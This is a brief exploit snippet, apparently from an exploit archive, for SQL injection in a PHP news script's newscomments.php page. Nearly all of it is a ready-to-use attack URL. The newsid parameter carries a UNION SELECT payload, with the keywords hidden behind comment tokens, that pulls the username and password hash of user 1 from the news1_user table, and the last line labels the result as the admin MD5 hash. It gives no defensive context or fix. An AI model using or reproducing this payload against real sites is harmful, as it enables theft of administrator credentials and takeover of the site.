$$$ http://[target]/[path]/newscomments.php
Example:
$$ http://[target]/[path]/newscomments.php?newsid='//union//select//0,username,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0//from//news1_user//where/**/userid=1/*
Admin MD5 HaSh